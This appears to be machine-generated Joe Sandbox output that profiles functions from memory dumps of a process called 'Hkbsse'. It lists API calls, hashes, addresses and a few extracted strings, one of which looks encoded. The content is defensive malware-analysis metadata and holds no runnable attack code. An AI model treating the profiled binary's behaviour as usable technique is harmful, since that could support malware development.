API String ID: 167067550-0
Opcode ID: 515aa144238605869475af97969ef2d5707eff47959053ca5f5507751980a644
Instruction ID: d76a2a41fa88fc31020fc4500ac26eeb1d6e40bf9ec5ad583c038c08cf0e7884
Opcode Fuzzy Hash: 515aa144238605869475af97969ef2d5707eff47959053ca5f5507751980a644
Instruction Fuzzy Hash: 2C21F2B1604635FFAB30AF75AC95D6BB7ADFF053A47228558F82897241D739EC0087A0

Function 00721A2E Relevance: 6.1, APIs: 4, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00721A89
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00721AA8
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00721AEF

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 1284976207-0
Opcode ID: ae07365b94ca23c4650cd0b3605938529dcb011693e7a54dc77f8391084589f6
Instruction ID: 4b5eb57fb2e559bd2971877822fe6025df8711460e2229f29ce30b6eb0613089
Opcode Fuzzy Hash: ae07365b94ca23c4650cd0b3605938529dcb011693e7a54dc77f8391084589f6
Instruction Fuzzy Hash: 6821F735700635ABCB15AB68E899BBD73B5BFA4334B40416AE401876D2DB7CAC81CBD0

Function 00720C9F Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 00720CF0
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00720CD8

Part of subcall function 00719136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00719157

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00720D53
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F518), ref: 00720D58

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: d0bec19143808023cefc508b6f86499efe9b602dd7748a6caac56014a2a7309d
Instruction ID: 0015cf5d4da0e76865020a928de867488111a847503a1703e84ffed0d2d5b0d5
Opcode Fuzzy Hash: d0bec19143808023cefc508b6f86499efe9b602dd7748a6caac56014a2a7309d
Instruction Fuzzy Hash: 4D212975700218FFCB14AB68DC49DAEB7BCEF48360F100516FA16A32D2CB74AD418AE5

Function 00719E9C Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00719EA3
std::bad_exception::bad_exception.LIBCMT ref: 00719F05
Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 00719F47
std::bad_exception::bad_exception.LIBCMT ref: 00719F71

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
String ID:
API String ID: 3836581985-0
Opcode ID: 0182e5b58d836a163dec9a48f0f5d049cb939aff4713fc28892c266688b1b148
Instruction ID: ce05993601723646c353ff338fcc92cf1ac456cf77acfd63dfdc3392fdd6f21d
Opcode Fuzzy Hash: 0182e5b58d836a163dec9a48f0f5d049cb939aff4713fc28892c266688b1b148
Instruction Fuzzy Hash: 7821D632904204EFCB05EFA8C45A9DDB7B8EF05310B20406AF505EB1D2DB396E8BCB55

Function 007150A9 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00715108
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0071512B
__EH_prolog3.LIBCMT ref: 00715146
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 0071516D

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 2642201467-0
Opcode ID: b39dd8bddcc5c7349a30e2aadaed4e1500d9f46bf60a7d0c83ddef208e4b11ad
Instruction ID: 90b3105d804673c43dace833ed5541eb29e55a0d5f8bce206f3c771abdd9501e
Opcode Fuzzy Hash: b39dd8bddcc5c7349a30e2aadaed4e1500d9f46bf60a7d0c83ddef208e4b11ad
Instruction Fuzzy Hash: 5B21B035600619EFCB18EFA8C885AAD77A5BF88301F10406AE9059B2D2DB79AE41CB50

Function 00721536 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 007215CA
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 0072157B

Part of subcall function 00718522: SafeRWList.LIBCONCRT ref: 00718533

SafeRWList.LIBCONCRT ref: 007215C0
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 007215E0

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: ad6915c17ecc598f61febc8de0377271cd8df12be60d6096f8761c691dbbb869
Instruction ID: a0453243e163537774097cb570e2bbbddf6c297ca92a7d649c23c31cbd4e8662
Opcode Fuzzy Hash: ad6915c17ecc598f61febc8de0377271cd8df12be60d6096f8761c691dbbb869
Instruction Fuzzy Hash: 2621F23160020ADBC704CF24D885FA5FBE9FB94318F60D2A6D4064B582DB39EAA5CBC0

Function 007261BE Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
Instruction ID: 4691c17781ff81ecd299cc5859ef83dfcf14fcf3273f7d51761fd8fb12066600
Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
Instruction Fuzzy Hash: C211C875E01335EBCB228B68BC44A1A37A8FF45760F210623E815A7291D778ED0086E4

Function 0070F4F4 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0070F516

Part of subcall function 0070F6D2: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 0071568D

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0070F537

Part of subcall function 007103B9: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 007103D5

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0070F553
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0070F55A

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 72e411914cb0fcf8d13f58c9890a88af7cfc82562902891560afe0679e3bd405
Instruction ID: b32cb260540094ad2650d363cba569a56f08a2ef6b4a0bd7734f2937f64e05bf
Opcode Fuzzy Hash: 72e411914cb0fcf8d13f58c9890a88af7cfc82562902891560afe0679e3bd405
Instruction Fuzzy Hash: 7201D6B1500305FBD730BF58CC898ABBBECDF10358B204A3AF455965D2D7B89A6487A1

Function 007235C5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007235DF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 007235F3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 0072360B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00723623

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 74def51b16f6b14c4b692eb073e86cd01b08f2f89386abe0b85b6688f1bcecea
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 4801A236604138B7CF16AE69A845EEFB79DAF54750F000055FD11AB382D939EE1196A0

Function 0072B8E3 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0072BA48,00000000,?,00732142,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0072B8F9
GetLastError.KERNEL32(?,00732142,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0072BA48,00000000,00000104,?), ref: 0072B903
__dosmaperr.LIBCMT ref: 0072B90A

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 8c712ef905e87c6c51826a754d30d3c8f5a37e36d861da8713e947d665e60d92
Instruction ID: 05933e159c40bf0d2aebbcd6bc7b5d9b02ceb18b9bcda9a0dc50ad7ca2d1118c
Opcode Fuzzy Hash: 8c712ef905e87c6c51826a754d30d3c8f5a37e36d861da8713e947d665e60d92
Instruction Fuzzy Hash: 43F08136604525FB8B211FB2FC08A5ABF69FF443A07058521F658C7020D735F891D7E0

Function 0072B94C Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0072BA48,00000000,?,007320CD,00000000,00000000,0072BA48,?,?,00000000,00000000,00000001), ref: 0072B962
GetLastError.KERNEL32(?,007320CD,00000000,00000000,0072BA48,?,?,00000000,00000000,00000001,00000000,00000000,?,0072BA48,00000000,00000104), ref: 0072B96C
__dosmaperr.LIBCMT ref: 0072B973

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 9ccbf7d7be1dffaf1e6fa39039e71422e04689a6062b1f6a11bc04b02d8cf16a
Instruction ID: af5f5d1ec4761782f0896548d2414d2cc631ffbad7d9e8755168a7c09387e646
Opcode Fuzzy Hash: 9ccbf7d7be1dffaf1e6fa39039e71422e04689a6062b1f6a11bc04b02d8cf16a
Instruction Fuzzy Hash: 0EF08132200525FB8B211FB6EC08A5AFF69FF447A07048525F698C7520D735F890C7E0

Function 0071520C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0071016D: TlsGetValue.KERNEL32(?,?,0070F6EE,0070F51B,?,?), ref: 00710173

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00715236

Part of subcall function 0071E515: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0071E53C
Part of subcall function 0071E515: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0071E555
Part of subcall function 0071E515: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0071E5CB
Part of subcall function 0071E515: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0071E5D3

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00715244
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 0071524E
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00715258

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 68e8ff0b8797b904982112fcdd5956e8882ad8697d32738a6b71a93e59230761
Instruction ID: bf9bf5b9ca2bc00d9bc84534e70b075cd605d1480b6fcec89c14900bfb3ade1c
Opcode Fuzzy Hash: 68e8ff0b8797b904982112fcdd5956e8882ad8697d32738a6b71a93e59230761
Instruction Fuzzy Hash: 80F02175B00514E7CB29B72D980A9DDB766AFC5B50B440015F811532C2DF7C9ED4C7D2

Function 0070C80B Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070FB18
Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0070FB4B
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0070FB57
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0070FB60

Part of subcall function 0070F4F4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0070F516
Part of subcall function 0070F4F4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0070F537

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
String ID:
API String ID: 2559503089-0
Opcode ID: b0ac12cebaf670ec5d334eee81d78a1e3c4e67a3a848c3f0357541783c11b06e
Instruction ID: b6a8b712077992da66b70ea8e4d7fa9d9dc27bb27d446d4930424585eebebf54
Opcode Fuzzy Hash: b0ac12cebaf670ec5d334eee81d78a1e3c4e67a3a848c3f0357541783c11b06e
Instruction Fuzzy Hash: A2F0E9B1600348E7DF34BAB8885AABE72C69F40324B18433DF5125B7C1DEBD9E059694

Function 00736C66 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(006F8877,0000000F,0045FB78,00000000,006F8877,?,00735352,006F8877,00000001,006F8877,006F8877,?,0073022B,00000000,?,006F8877), ref: 00736C7D
GetLastError.KERNEL32(?,00735352,006F8877,00000001,006F8877,006F8877,?,0073022B,00000000,?,006F8877,00000000,006F8877,?,0073077F,006F8877), ref: 00736C89

Part of subcall function 00736C4F: CloseHandle.KERNEL32(00462970,00736C99,?,00735352,006F8877,00000001,006F8877,006F8877,?,0073022B,00000000,?,006F8877,00000000,006F8877), ref: 00736C5F

___initconout.LIBCMT ref: 00736C99

Part of subcall function 00736C11: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,00736C40,0073533F,006F8877,?,0073022B,00000000,?,006F8877,00000000), ref: 00736C24

WriteConsoleW.KERNEL32(006F8877,0000000F,0045FB78,00000000,?,00735352,006F8877,00000001,006F8877,006F8877,?,0073022B,00000000,?,006F8877,00000000), ref: 00736CAE

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: f1e923e0e3f20a79b0aa28e7194d4c44c68a23bc7a68e011689c1a93b7c01c7c
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: 4DF03036101224BBDF625FA5EC089993F26FB483A1F009021FE1C96132D676DC20DBA5

Function 004469FF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00408610,0000000F,0045FB78,00000000,00408610,?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610), ref: 00446A16
GetLastError.KERNEL32(?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610,00000000,00408610,?,00440518,00408610), ref: 00446A22

Part of subcall function 004469E8: CloseHandle.KERNEL32(FFFFFFFE,00446A32,?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610,00000000,00408610), ref: 004469F8

___initconout.LIBCMT ref: 00446A32

Part of subcall function 004469AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004469D9,004450D8,00408610,?,0043FFC4,00000000,?,00408610,00000000), ref: 004469BD

WriteConsoleW.KERNEL32(00408610,0000000F,0045FB78,00000000,?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610,00000000), ref: 00446A47

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: eb101eafd28bdb580c54fcbc0025a6c2856bea8722c135a9e5857212bf2778cf
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: 59F06536101654BBDF621FE5EC09A8A3F26FF4A3A1F019022FE1C95131D672DC20DB9A

Function 0040A879 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000,B007A738,00000000), ref: 0040A87C

Strings

8D|, xrefs: 0040A90E
H9YbUVhqfFE=, xrefs: 0040A8C0

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID: 8D|$H9YbUVhqfFE=
API String ID: 1611563598-224196416
Opcode ID: 3b8952cef4dec82063d98d34a049d87dc19ebb7573eacb20f3488b2c7d4d7e5f
Instruction ID: b4a6ee12dd4c3bb70f0697cbc749ffb91c101e36eb5702eb36083ec989056c50
Opcode Fuzzy Hash: 3b8952cef4dec82063d98d34a049d87dc19ebb7573eacb20f3488b2c7d4d7e5f
Instruction Fuzzy Hash: 6E912D71E102045BEB19D778CE4979DB6329F82308F50816DE009B73D6EB3D5ED48B5A

Function 0043E5F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0043E189: GetOEMCP.KERNEL32(00000000,0043E3FB,00000000,004065D9,0043751E,0043751E,004065D9,00000000,00000000), ref: 0043E1B4

IsValidCodePage.KERNEL32(-00000030,00000000,014E8DFF,00000000,?,?,0043E442,00000000,00000000,00000000,?,00000000,?,?,?,0043751E), ref: 0043E652
GetCPInfo.KERNEL32(00000000,BC,?,?,0043E442,00000000,00000000,00000000,?,00000000,?,?,?,0043751E,004065D9,00000000), ref: 0043E694

Strings

BC, xrefs: 0043E68F, 0043E692

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: BC
API String ID: 546120528-447861928
Opcode ID: 34aef9671d96513edeb153721768ae55340314f252b24a7923855812581dc321
Instruction ID: eaa448b68eac6edf95ba47836c9976a4c4254416396ed1bc20bfc28285d70f8d
Opcode Fuzzy Hash: 34aef9671d96513edeb153721768ae55340314f252b24a7923855812581dc321
Instruction Fuzzy Hash: 26512230A013059EEB208F77C8416ABBBF5AF59304F14616FD0968B3D2E77D95428B99

Function 0040A830 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 004093F0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,B007A738,00000000,00000000), ref: 0040943F

Part of subcall function 004090A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,B007A738,00000000,00000000), ref: 004090EF

SetCurrentDirectoryA.KERNEL32(00000000,B007A738,00000000), ref: 0040A87C

Strings

8D|, xrefs: 0040A90E
H9YbUVhqfFE=, xrefs: 0040A8C0

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: FileModuleName$CurrentDirectory
String ID: 8D|$H9YbUVhqfFE=
API String ID: 1135421992-224196416
Opcode ID: f55a084f2cd57442882bed4ebd49cbc97c29b87189af5c609434f488aa97715a
Instruction ID: 0f9ad9d943cb563efdd18472409bfffaa3d184112135928f36d6aae2e4a3ebd2
Opcode Fuzzy Hash: f55a084f2cd57442882bed4ebd49cbc97c29b87189af5c609434f488aa97715a
Instruction Fuzzy Hash: 6951C970D002489BEF14EB64C9457DDBB729B52308F5081AED405773C2EB785A89CF97

Function 00724A47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00724A86
__IsNonwritableInCurrentImage.LIBCMT ref: 00724B3A

Strings

csm, xrefs: 00724B24

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 6d031ba505c9ec8e722e9c4453558d7d4a8e6396e40e733c41e229fa6cb4f40d
Instruction ID: de0abbf08487cdbe4e497d84d322fb84064a884ea15241aa300453d81020b5dc
Opcode Fuzzy Hash: 6d031ba505c9ec8e722e9c4453558d7d4a8e6396e40e733c41e229fa6cb4f40d
Instruction Fuzzy Hash: FC41E574A00628EBCF10DF68D888A9E7BB5FF45314F148056E8149B352D779EE11CB91

Function 0072E647 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0072E3F0: GetOEMCP.KERNEL32(00000000,0072E662,?,?,00727785,00727785,?), ref: 0072E41B

_free.LIBCMT ref: 0072E6BF

Strings

@"F, xrefs: 0072E6E7

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"F
API String ID: 269201875-3084318295
Opcode ID: 8b0a6106cb1ee21935c2e95d3b856d5b1c89e5012ee23919a3339f3b95d7c5b1
Instruction ID: 7bbf69d9115803020a6155cc4cb0ed47efcf24d0bdc83c4c96bfda548e73656c
Opcode Fuzzy Hash: 8b0a6106cb1ee21935c2e95d3b856d5b1c89e5012ee23919a3339f3b95d7c5b1
Instruction Fuzzy Hash: 4231D072900269AFCB01DFA8E884BDA7BE4EF50310F11006AF911AB2A1EB79DD50CB51

Function 00726A42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00726BD3: _free.LIBCMT ref: 00726BE1

Part of subcall function 0072B230: MultiByteToWideChar.KERNEL32(00000000,?,00000000,00726F41,?,?,Aor,00726A9F,Aor,00000009,00000000,000000FF,00000000,00000000,00465338,?), ref: 0072B2A0

GetLastError.KERNEL32(?,?,?,?,?,?,?,00726F41,00000000,?,00000000,?), ref: 00726AA6
__dosmaperr.LIBCMT ref: 00726AAD

Strings

Aor, xrefs: 00726A97

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr_free
String ID: Aor
API String ID: 4030486722-3531037085
Opcode ID: 4152818cdc943b184735e8b7f4f3464c4ff2eb27d7786bbd11738f780f2f4e06
Instruction ID: 7476acb1f4c0c057a375461dd28bec5fbe7bbddc6e1f60967c8c5f34fed277b3
Opcode Fuzzy Hash: 4152818cdc943b184735e8b7f4f3464c4ff2eb27d7786bbd11738f780f2f4e06
Instruction Fuzzy Hash: 9721D231600675ABCB209F25AC01A5B77B5EF90360F20C51BF82AE7291E779E8008BA0

Function 0072A8C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0072A915
_free.LIBCMT ref: 0072A949

Strings

x!F, xrefs: 0072A93C

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
Opcode ID: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction ID: e7efbb9129871ccdf67d170fbc9978c18ba86bad4fdea8706ceb62d04b4d3642
Opcode Fuzzy Hash: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction Fuzzy Hash: 1F01AC31909A32BBD62132767D0AA7E13085F12730F560321FEA0790E2EF5D9D5681D7

Function 0043A65E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A6AE
_free.LIBCMT ref: 0043A6E2

Strings

x!F, xrefs: 0043A6D5

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
